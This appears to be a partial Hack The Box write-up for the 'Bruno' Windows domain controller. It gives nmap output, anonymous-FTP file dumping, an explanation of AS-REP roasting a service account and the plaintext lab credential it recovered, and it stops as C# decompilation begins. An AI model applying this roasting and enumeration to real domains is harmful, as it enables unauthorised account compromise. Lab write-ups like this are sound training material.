HTB - Bruno


https://labs.hackthebox.com/achievement/machine/1503196/781

User.txt

Nmap Enumeration

PORT      STATE SERVICE       REASON          VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-29-22 04:55PM <DIR> app
| 06-29-22 04:33PM <DIR> benign
| 06-29-22 01:41PM <DIR> malicious
|_06-29-22 04:33PM <DIR> queue
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-05-06 04:22:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after: 2105-10-09T09:54:08
| MD5: e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1: 855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
443/tcp open ssl/https? syn-ack ttl 127
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-29T13:23:01
| Not valid after: 2121-06-29T13:33:00
| MD5: 659b 3c90 00eb 1e0a 5170 1be9 0456 840c
| SHA-1: a093 f4c2 3c8e 0532 86f2 1e99 cad7 82f8 e40e 3d72
| SHA-256: 427d 451e b031 5365 7c58 b5e6 3f16 c7c9 4a1e 788e e86e be01 4442 2949 1754 f63b
| -----BEGIN CERTIFICATE-----
| MIIDaTCCAlGgAwIBAgIQUtEbK1zCdqVN5bd/XhJejTANBgkqhkiG9w0BAQsFADBG
| MRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZMBcG
| A1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yMjA2MjkxMzIzMDFaGA8yMTIxMDYy
| OTEzMzMwMFowRjESMBAGCgmSJomT8ixkARkWAnZsMRUwEwYKCZImiZPyLGQBGRYF
| YnJ1bm8xGTAXBgNVBAMTEGJydW5vLUJSVU5PREMtQ0EwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQCrd/LZo4VhJnmSCReqrtb6gD4NAIRLeoyJYgau6h4O
| cF3sGNSNm210YKZErRp2k9dgKNNey9eJ263yth9hY40D0RUg90ridTUfucWwic4n
| LrV3Ud+I4IrRiSIpAjURuj6yNNm12hNhGc+V9fFr/8F6qk2mVCAey1YQtQC9Hy8n
| lDozddvnKJM301cktgpq+hvTKAD4wT89nvgxV8TQBguMmYj2JgilHcNiVHjEJVM4
| zmwuxWEAl6Imy3rsqjtadmNVqTcQ1uh6sjJFC1mcjG4LHTtyQJziyvM8gt0ftXEG
| bSHvSuwK5m7+0LqimoyXkuBj3L4BE0Zxi1veTVG9BXKlAgMBAAGjUTBPMAsGA1Ud
| DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBRymma+nX59JCIuEqzy
| XpY1Kq6t6DAQBgkrBgEEAYI3FQEEAwIBADANBgkqhkiG9w0BAQsFAAOCAQEAk+Gd
| sTRy/LmduD1KEfb69YUzAxID4AL4kyKZUMxdP2Y5KEcQOpujW23ctG2iRrPCNAZW
| K4sfZj5rLrGCUdzCRpl7dU+ag1tgyYtQz6mtx7r8ojQvFa3ehvzgH5Kuubnx8YJf
| UN0rgD4bHf2vEub2/7ZK2uRN+xdYuYKW5JDLXpYUOi2YgzpjHuPTqJ8rFYpDsiPb
| kms6eaHUgsGde6mf3fzYXrzN2T9jp3DVnQ9a+cG6t58X/QzhLByO9q4RkI8doqcS
| OWEA5QD0ALJL2yHL31M6VwqYiO0vkpwc1DiRP+MVUX/YgsIWFA2ygf93loF/3hqP
| wc7DM/NxbJM1GJzG4Q==
|_-----END CERTIFICATE-----
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after: 2105-10-09T09:54:08
| MD5: e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1: 855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after: 2105-10-09T09:54:08
| MD5: e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1: 855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after: 2105-10-09T09:54:08
| MD5: e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1: 855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Issuer: commonName=brunodc.bruno.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-05T04:19:16
| Not valid after: 2026-11-04T04:19:16
| MD5: 128d 1721 d9c7 6e11 6ed6 8695 cd13 3d26
| SHA-1: bc9d 5820 ea07 b78c 8318 d706 ccd5 12ee 6f16 01cf
| SHA-256: 3f65 fd9c f5ae 1e3a 0963 faf3 c18b eedd 35ae 04d5 b54b 532c 61d5 1535 492f 8b78
| -----BEGIN CERTIFICATE-----
| MIIC5DCCAcygAwIBAgIQZW8PIg+Ns5BIZMqVKmaqwzANBgkqhkiG9w0BAQsFADAb
| MRkwFwYDVQQDExBicnVub2RjLmJydW5vLnZsMB4XDTI2MDUwNTA0MTkxNloXDTI2
| MTEwNDA0MTkxNlowGzEZMBcGA1UEAxMQYnJ1bm9kYy5icnVuby52bDCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBALS8pfB9XjARYg9mAtzQJ3fIbe/8YhGC
| hDihRB0OlfPjRz2HhmfzirYM+vwH2PQu/ZL8/s0rXOkSY/h1FO8vv8CLEatf0kbj
| M1YprfN6FITMC/57HLn5JnBRB5E4O03OBL9A3ZyiudJ4LQElW2EOFoeZxFcdevjo
| WjY4B1jYR8CUoXff3BmViW/lfbP0U3UhHvRVWgV/9bOMUdWVPsh1GtVkHbwjCbHw
| fCPe5uISipN5YABArBspR/+OqrLmOxc/ah8oRL/q6TxyR3PtgVN/ZSKaXMMxNt/I
| hJa+zZjGidLVqFtcFFUFpz/MtH8Vqc6cqpznkjDhZBiJtW9m6Jyfa2UCAwEAAaMk
| MCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEB
| CwUAA4IBAQCdtx0x0ch42RfXwajcgZ0iAn6NBeBrnJZXN936PCXV1QG9LIIlueuH
| Hj7A7PdinxtgqvClxtfCnZPZV4dUI3szYJOBmmABkdKC/Mmxo37WAy/MkBkZY2tD
| 86AOjZISiryc0K8HT3Y5x+CHr2RDWT9bvOpuRAB2npUw8LsEqRy3IzqmQseNHgxL
| 4wd4nkYW6QZ+cEo1uXKa5P5BWWIkO+opAPmLOfNkDpHvaA6oKsFCDCYcjyopZGPZ
| XyTwdypaQvKL9zitNgvh9Tz84PxjRP0UPsGW9JOrQ2I92RPFE5+1TR3SDICvjYrT
| JRGXPRrzSZSW7liTuy2voc3tNoPfI+EQ
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: BRUNO
| NetBIOS_Domain_Name: BRUNO
| NetBIOS_Computer_Name: BRUNODC
| DNS_Domain_Name: bruno.vl
| DNS_Computer_Name: brunodc.bruno.vl
| DNS_Tree_Name: bruno.vl
| Product_Version: 10.0.20348
|_ System_Time: 2026-05-06T04:23:34+00:00
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
64002/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
64003/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
64070/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
64083/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: BRUNODC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-05-06T04:23:34
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26150/tcp): CLEAN (Timeout)
| Check 2 (port 11545/tcp): CLEAN (Timeout)
| Check 3 (port 33673/udp): CLEAN (Timeout)
| Check 4 (port 41179/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Port 80

Browsing port 80 directly turns up nothing, so next I enumerate subdomains with ffuf.

This reveals a dev subdomain.

It looks like a service that lets you upload an .exe and scans it to decide whether it is malware.

After repeated testing, both .exe and .zip files can be uploaded here; a .zip is automatically extracted into the scan queue. No usable attack surface was found on the web side itself.


FTP Enumeration

Anonymous FTP gives read-only access: nothing can be uploaded or deleted.

The directory names closely match what the web page shows, so these should be the directories behind the dev service.

Dump all the files anonymously with wget.
Payload:

wget -r --no-parent --user="anonymous" --password="" ftp://10.129.197.115/

File: /app

Looking at a few of the JSON files, this appears to be a program written in C#.

The changelog mentions "automation using svc_scan". svc_scan is likely a service account, and accounts that run services are often set up with weaker protections, possibly without Kerberos pre-authentication required, so let's try roasting.

AS-REP Roasting

ASREPRoast is a security attack that targets user accounts which do not have the "Kerberos pre-authentication required" attribute set.

Essentially, this weakness lets an attacker request authentication data for a user directly from the Domain Controller (DC) without knowing the user's password. The DC then returns a message encrypted with a key derived from that user's password, which the attacker can try to crack offline to recover the plaintext password.

This yields a plaintext credential pair:

svc_scan:Sunshin1

After some trial, these credentials turn out to work only against the SMB service.

And this account has read/write permission on queue.


Dump File

Let's look for other ways in first. Analysing the files downloaded over FTP, they appear to be the software behind the web service: the folders match those shown on the website, except that /app is never shown, so /app is presumably the folder the service runs from.

Let's start by reverse engineering the application behind the web service.

Reverse C#

Use file to check whether the DLL was written in C#.

Then use ilspycmd to decompile it and inspect its functionality.

A quick note on how C# is compiled to IL and then JIT-compiled to machine code:
